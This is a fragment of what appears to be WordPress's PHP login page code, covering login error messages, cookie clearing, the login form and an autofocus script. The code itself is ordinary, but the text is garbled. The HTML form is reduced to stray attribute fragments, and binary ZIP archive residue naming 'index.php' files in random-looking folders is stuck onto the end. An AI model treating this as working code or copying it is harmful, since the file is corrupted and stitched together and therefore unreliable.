PHP_URL_QUERY ); parse_str( $query_component, $query ); if ( ! empty( $query['app_name'] ) ) { /* translators: 1: Website name, 2: Application name. */ $message = sprintf( 'Please log in to %1$s to authorize %2$s to connect to your account.', get_bloginfo( 'name', 'display' ), '' . esc_html( $query['app_name'] ) . '' ); } else { /* translators: %s: Website name. */ $message = sprintf( 'Please log in to %s to proceed with authorization.', get_bloginfo( 'name', 'display' ) ); } $errors->add( 'authorize_application', $message, 'message' ); } } /** * Filters the login page errors. * * @since 3.6.0 * * @param WP_Error $errors WP Error object. * @param string $redirect_to Redirect destination URL. */ $errors = apply_filters( 'wp_login_errors', $errors, $redirect_to ); // Clear any stale cookies. if ( $reauth ) { wp_clear_auth_cookie(); } login_header( __( 'Log In' ), '', $errors ); if ( isset( $_POST['log'] ) ) { $user_login = ( 'incorrect_password' === $errors->get_error_code() || 'empty_password' === $errors->get_error_code() ) ? esc_attr( wp_unslash( $_POST['log'] ) ) : ''; } $rememberme = ! empty( $_POST['rememberme'] ); if ( $errors->has_errors() ) { $aria_describedby_error = ' aria-describedby="login_error"'; } else { $aria_describedby_error = ''; } wp_enqueue_script( 'user-profile' ); ?>

class="input" value="" size="20" autocapitalize="off" />

class="input password-input" value="" size="20" />

/>

get_error_code() === 'invalid_username' ) { $login_script .= 'd.value = "";'; } } $login_script .= 'd.focus(); d.select();'; $login_script .= '} catch( er ) {}'; $login_script .= '}, 200);'; $login_script .= "}\n"; // End of wp_attempt_focus(). /** * Filters whether to print the call to `wp_attempt_focus()` on the login screen. * * @since 4.8.0 * * @param bool $print Whether to print the function call. Default true. */ if ( apply_filters( 'enable_login_autofocus', true ) && ! $error ) { $login_script .= "wp_attempt_focus();\n"; } // Run `wpOnload()` if defined. $login_script .= "if ( typeof wpOnload === 'function' ) { wpOnload() }"; ?> 5\| lmhn/index.phpnuW+APK@5\?K htpr/index.phpnuW+APK <